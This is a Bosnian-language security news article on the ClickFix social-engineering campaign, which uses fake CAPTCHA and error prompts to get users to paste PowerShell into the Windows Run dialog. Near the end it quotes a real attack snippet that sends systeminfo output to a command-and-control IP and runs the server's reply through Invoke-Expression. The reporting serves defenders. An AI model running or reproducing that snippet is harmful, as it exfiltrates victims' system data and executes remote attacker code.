Istraživači sajber sigurnosti identifikovali su sofisticiranu novu kampanju socijalnog inženjeringa koja iskorištava fundamentalno ljudsko povjerenje u svakodnevnim interakcijama s računarima.
Tehnika ClickFix, koja se aktivno primjenjuje od marta 2024. godine, predstavlja opasnu evoluciju u taktikama sajber kriminala koja zaobilazi tradicionalne sigurnosne mjere ciljajući najranjiviju komponentu bilo koje mreže: krajnjeg korisnika.
Ova obmanjujuća metoda se maskira kao rutinske poruke o grešci, CAPTCHA provjere ili obavještenja o održavanju sistema kako bi prevarila žrtve da izvrše zlonamjerni kod na vlastitim sistemima.
Tehnika je brzo stekla zamah u ekosistemu sajber kriminala, privlačeći pažnju pojedinačnih hakera na sofisticirane grupe Advanced Persistent Threat, uključujući APT28 i MuddyWater, organizacije povezane s ruskim, odnosno iranskim državnim interesima.
ClickFix kampanje su uspješno kompromitovale organizacije u različitim sektorima, uključujući zdravstvo, ugostiteljstvo, automobilsku industriju i vladine agencije, demonstrirajući univerzalnu primjenjivost ovog vektora napada usmjerenog na ljude.
Analitičari Darktracea identificirali su višestruke ClickFix napade u korisničkim okruženjima u Evropi, Bliskom istoku, Africi i Sjedinjenim Američkim Državama, otkrivajući globalni obim ove nove prijetnje.
Njihova istraga otkrila je sistematski pristup u kojem hakeri koriste spear phishing e-poruke, drive-by kompromitacije i iskorištavanje pouzdanih platformi poput GitHuba za isporuku malicioznog sadržaja.
Napadi obično počinju skrivenim linkovima ugrađenim u e-poruke ili malicioznim oglasima na kompromitovanim legitimnim web stranicama koje preusmjeravaju nesuđene korisnike na maliciozne URL-ove dizajnirane da se pojavljuju kao legitimni sistemski upiti.
Psihološka manipulacija svojstvena ClickFix napadima iskorištava prirodnu sklonost korisnika da rješavaju očigledne tehničke probleme.
Žrtve se susreću s uvjerljivim lažnim CAPTCHA upitima ili dijaloškim okvirima „Popravi“ koji izgledaju kao da rješavaju nepostojeće probleme poput grešaka u prikazu web stranice ili zahtjeva za registraciju uređaja.
Nakon što se aktiviraju, korisnici prolaze kroz ono što izgleda kao standardni proces verifikacije u tri koraka koji u konačnici olakšava izvršavanje malicioznih PowerShell naredbi na njihovim sistemima.
Finansijski i operativni uticaj ovih napada daleko prevazilazi početno kompromitovanje sistema.
Nakon uspješnog početnog pristupa, akteri prijetnji uspostavljaju komunikacijske kanale za komandu i kontrolu unutar ciljanih okruženja, omogućavajući lateralno kretanje kroz mreže s primarnim ciljem dobijanja i izvlačenja osjetljivih organizacijskih podataka.
Maliciozni korisni sadržaji povezani s raznim porodicama malicioznog softvera, uključujući XWorm, Lumma i AsyncRAT , često se koriste tokom ovih kampanja.
Tehnička analiza mehanizma infekcije
Tehnička sofisticiranost ClickFix napada ne leži u razvoju složenog malicioznog softvera, već u besprijekornoj integraciji društvenog inženjeringa s legitimnim sistemskim funkcijama.
Lanac napada počinje kada žrtve naiđu na pažljivo kreirane upite koji im upućuju da pritisnu Windows Key + R kako bi otvorile dijaloški okvir Run, nakon čega slijede pritisci CTRL + V za lijepljenje unaprijed učitane maliciozne PowerShell naredbe i na kraju pritisnu Enter za izvršavanje sadržaja.
Darktrace-ova istraga o konkretnom napadu od 9. aprila 2025. godine otkrila je tehničke složenosti ovog procesa.
Kompromitacija je pokrenula vanjsku komunikaciju s infrastrukturom za komandu i kontrolu, izazivajući detekciju novog korisničkog agenta PowerShell-a, što ukazuje na pokušaj udaljenog izvršavanja koda.
.webp)
Maliciozna PowerShell naredba sadržavala je sofisticirane tehnike maskiranja i konvencije imenovanja datoteka zasnovane na vremenskim oznakama.
Analiza mrežnog prometa snimljenog tokom napada otkrila je funkcionalnost PowerShell skripte putem ispitivanja hvatanja paketa.
Naredba pretvara trenutno vrijeme u Unix epoh format, kreirajući dinamički imenovane datoteke koje se pojavljuju kao bezopasni numerički nizovi.
.webp)
Na primjer, napad je generisao datoteku pod nazivom „1744205184“ koja odgovara tačnom vremenskom žigu izvršenja, nakon čega slijedi sekundarna datoteka „1744205200“ koja sadrži podatke o izviđanju sistema.
$s=[int64](((datetime)::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffff0;
$b="193.36.38.237";
$c='IRM'; $d='POST'; $e='Invoke-Expression';
$f=$(systeminfo|out-string);
&($c) "$b`:8080/$s" -Method $d -Body $f -ContentType 'application/octet-stream'|&($e)Ovaj PowerShell isječak demonstrira metodologiju napada, uspostavljajući varijable za ciljnu IP adresu, HTTP metode i prikupljanje sistemskih informacija prije slanja sveobuhvatnih detalja uređaja na komandni i kontrolni server na 193.36.38.237.
Ukradeni podaci uključivali su kompletne sistemske specifikacije, konfiguracije mreže, sigurnosne funkcije i detalje o hardveru, pružajući napadačima opsežne obavještajne podatke za planiranje narednih faza napada.
Izvor: CyberSecurityNews
